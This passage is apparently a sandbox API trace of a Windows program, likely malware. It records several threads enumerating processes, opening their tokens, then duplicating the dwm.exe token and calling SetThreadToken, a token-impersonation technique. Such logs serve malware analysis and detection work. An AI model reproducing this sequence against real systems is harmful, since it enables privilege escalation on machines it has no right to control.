bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0095.412] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x0) returned 0 [0095.413] CloseHandle (hObject=0x1e8) returned 1 [0095.413] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.413] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0095.413] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x0) returned 0 [0095.413] CloseHandle (hObject=0x1e8) returned 1 [0095.414] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.414] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0095.414] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x0) returned 0 [0095.414] CloseHandle (hObject=0x1e8) returned 1 [0095.414] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.415] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0095.415] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.415] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.415] CloseHandle (hObject=0x1194) returned 1 [0095.415] CloseHandle (hObject=0x1e8) returned 1 [0095.415] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.416] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0095.416] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.416] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.417] CloseHandle (hObject=0x1194) returned 1 [0095.417] CloseHandle (hObject=0x1e8) returned 1 [0095.417] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0095.417] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3ac) returned 0x1e8 [0095.417] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x0) returned 0 [0095.417] CloseHandle (hObject=0x1e8) returned 1 [0095.418] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.418] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0095.418] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x0) returned 0 [0095.418] CloseHandle (hObject=0x1e8) returned 1 [0095.418] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.419] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0095.419] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x0) returned 0 [0095.419] CloseHandle (hObject=0x1e8) returned 1 [0095.419] Process32Next (in: hSnapshot=0x334, lppe=0x17f3fe58 | out: lppe=0x17f3fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0095.420] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x444) returned 0x1e8 [0095.420] OpenProcessToken (in: ProcessHandle=0x1e8, DesiredAccess=0xa, TokenHandle=0x17f3fdc4 | out: TokenHandle=0x17f3fdc4*=0x1194) returned 1 [0095.420] GetTokenInformation (in: TokenHandle=0x1194, TokenInformationClass=0xa, TokenInformation=0x17f3fe20, TokenInformationLength=0x38, ReturnLength=0x17f3fde4 | out: TokenInformation=0x17f3fe20, ReturnLength=0x17f3fde4) returned 1 [0095.420] DuplicateToken (in: ExistingTokenHandle=0x1194, ImpersonationLevel=0x2, DuplicateTokenHandle=0x17f3fdd0 | out: DuplicateTokenHandle=0x17f3fdd0*=0x13e0) returned 1 [0095.420] SetThreadToken (Thread=0x0, Token=0x13e0) returned 1 [0095.420] CloseHandle (hObject=0x13e0) returned 1 [0095.420] CloseHandle (hObject=0x1194) returned 1 [0095.421] CloseHandle (hObject=0x1e8) returned 1 [0095.421] CloseHandle (hObject=0x334) returned 1 [0095.421] lstrcmpiW (lpString1="C:\\", lpString2="Microsoft Terminal Services") returned -1 [0095.424] wsprintfW (in: param_1=0x17f3fb18, param_2="%s\\*" | out: param_1="Microsoft Terminal Services\\*") returned 29 [0095.424] FindFirstFileExW (in: lpFileName="Microsoft Terminal Services\\*", fInfoLevelId=0x0, lpFindFileData=0x17f3fd28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x17f3fd28) returned 0xffffffff [0095.424] RtlExitUserThread (Status=0x0) Thread: id = 316 os_tid = 0xedc [0095.425] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x1807fdc8 | out: TokenHandle=0x1807fdc8*=0x1e8) returned 1 [0095.425] GetTokenInformation (in: TokenHandle=0x1e8, TokenInformationClass=0x12, TokenInformation=0x1807fdc0, TokenInformationLength=0x4, ReturnLength=0x1807fdcc | out: TokenInformation=0x1807fdc0, ReturnLength=0x1807fdcc) returned 1 [0095.425] GetTokenInformation (in: TokenHandle=0x1e8, TokenInformationClass=0x13, TokenInformation=0x1807fdc0, TokenInformationLength=0x4, ReturnLength=0x1807fdcc | out: TokenInformation=0x1807fdc0, ReturnLength=0x1807fdcc) returned 1 [0095.425] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0xa, TokenInformation=0x1807fde8, TokenInformationLength=0x38, ReturnLength=0x1807fdcc | out: TokenInformation=0x1807fde8, ReturnLength=0x1807fdcc) returned 1 [0095.425] CloseHandle (hObject=0x334) returned 1 [0095.425] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x334 [0095.449] Process32First (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.449] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0095.450] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0095.450] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x1194 [0095.450] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x0) returned 0 [0095.450] CloseHandle (hObject=0x1194) returned 1 [0095.451] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0095.451] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x1194 [0095.451] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.452] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.452] CloseHandle (hObject=0x13e0) returned 1 [0095.452] CloseHandle (hObject=0x1194) returned 1 [0095.452] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.453] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x1194 [0095.453] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.453] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.453] CloseHandle (hObject=0x13e0) returned 1 [0095.453] CloseHandle (hObject=0x1194) returned 1 [0095.453] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0095.454] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x1194 [0095.454] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.454] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.454] CloseHandle (hObject=0x13e0) returned 1 [0095.454] CloseHandle (hObject=0x1194) returned 1 [0095.454] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0095.455] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x184) returned 0x1194 [0095.455] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.455] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.455] CloseHandle (hObject=0x13e0) returned 1 [0095.455] CloseHandle (hObject=0x1194) returned 1 [0095.455] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0095.456] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1194 [0095.456] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.456] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.456] CloseHandle (hObject=0x13e0) returned 1 [0095.456] CloseHandle (hObject=0x1194) returned 1 [0095.456] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0095.457] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1194 [0095.457] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.457] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.457] CloseHandle (hObject=0x13e0) returned 1 [0095.457] CloseHandle (hObject=0x1194) returned 1 [0095.457] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0095.458] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1194 [0095.459] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.459] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.459] CloseHandle (hObject=0x13e0) returned 1 [0095.459] CloseHandle (hObject=0x1194) returned 1 [0095.459] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0095.460] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1194 [0095.460] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.460] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.460] CloseHandle (hObject=0x13e0) returned 1 [0095.460] CloseHandle (hObject=0x1194) returned 1 [0095.460] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.461] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x250) returned 0x1194 [0095.461] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x0) returned 0 [0095.461] CloseHandle (hObject=0x1194) returned 1 [0095.461] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.461] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x294) returned 0x1194 [0095.461] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x0) returned 0 [0095.462] CloseHandle (hObject=0x1194) returned 1 [0095.462] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.462] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1194 [0095.475] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x0) returned 0 [0095.475] CloseHandle (hObject=0x1194) returned 1 [0095.475] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.476] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x338) returned 0x1194 [0095.476] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.476] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.476] CloseHandle (hObject=0x13e0) returned 1 [0095.476] CloseHandle (hObject=0x1194) returned 1 [0095.476] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.477] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x370) returned 0x1194 [0095.477] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.477] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.477] CloseHandle (hObject=0x13e0) returned 1 [0095.477] CloseHandle (hObject=0x1194) returned 1 [0095.477] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0095.478] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3ac) returned 0x1194 [0095.478] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x0) returned 0 [0095.478] CloseHandle (hObject=0x1194) returned 1 [0095.479] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.479] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xc8) returned 0x1194 [0095.479] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x0) returned 0 [0095.479] CloseHandle (hObject=0x1194) returned 1 [0095.479] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0095.480] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x11c) returned 0x1194 [0095.480] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x0) returned 0 [0095.480] CloseHandle (hObject=0x1194) returned 1 [0095.480] Process32Next (in: hSnapshot=0x334, lppe=0x1807fe58 | out: lppe=0x1807fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0095.481] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x444) returned 0x1194 [0095.481] OpenProcessToken (in: ProcessHandle=0x1194, DesiredAccess=0xa, TokenHandle=0x1807fdc4 | out: TokenHandle=0x1807fdc4*=0x13e0) returned 1 [0095.481] GetTokenInformation (in: TokenHandle=0x13e0, TokenInformationClass=0xa, TokenInformation=0x1807fe20, TokenInformationLength=0x38, ReturnLength=0x1807fde4 | out: TokenInformation=0x1807fe20, ReturnLength=0x1807fde4) returned 1 [0095.481] DuplicateToken (in: ExistingTokenHandle=0x13e0, ImpersonationLevel=0x2, DuplicateTokenHandle=0x1807fdd0 | out: DuplicateTokenHandle=0x1807fdd0*=0x13e4) returned 1 [0095.481] SetThreadToken (Thread=0x0, Token=0x13e4) returned 1 [0095.481] CloseHandle (hObject=0x13e4) returned 1 [0095.481] CloseHandle (hObject=0x13e0) returned 1 [0095.481] CloseHandle (hObject=0x1194) returned 1 [0095.482] CloseHandle (hObject=0x334) returned 1 [0095.482] lstrcmpiW (lpString1="C:\\", lpString2="Microsoft Terminal Services") returned -1 [0095.489] wsprintfW (in: param_1=0x1807fb18, param_2="%s\\*" | out: param_1="Microsoft Terminal Services\\*") returned 29 [0095.498] FindFirstFileExW (in: lpFileName="Microsoft Terminal Services\\*", fInfoLevelId=0x0, lpFindFileData=0x1807fd28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x1807fd28) returned 0xffffffff [0095.523] RtlExitUserThread (Status=0x0) Thread: id = 318 os_tid = 0xf3c [0112.208] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x219fdc8 | out: TokenHandle=0x219fdc8*=0x344) returned 1 [0112.208] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x12, TokenInformation=0x219fdc0, TokenInformationLength=0x4, ReturnLength=0x219fdcc | out: TokenInformation=0x219fdc0, ReturnLength=0x219fdcc) returned 1 [0112.208] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x13, TokenInformation=0x219fdc0, TokenInformationLength=0x4, ReturnLength=0x219fdcc | out: TokenInformation=0x219fdc0, ReturnLength=0x219fdcc) returned 1 [0112.208] GetTokenInformation (in: TokenHandle=0x81c, TokenInformationClass=0xa, TokenInformation=0x219fde8, TokenInformationLength=0x38, ReturnLength=0x219fdcc | out: TokenInformation=0x219fde8, ReturnLength=0x219fdcc) returned 1 [0112.208] CloseHandle (hObject=0x81c) returned 1 [0112.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x13c0 [0112.330] Process32First (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.331] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0112.331] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.332] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x3ac [0112.332] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0112.332] CloseHandle (hObject=0x3ac) returned 1 [0112.332] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.332] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x3ac [0112.332] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.332] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.332] CloseHandle (hObject=0x2f4) returned 1 [0112.333] CloseHandle (hObject=0x3ac) returned 1 [0112.333] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.333] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x3ac [0112.333] 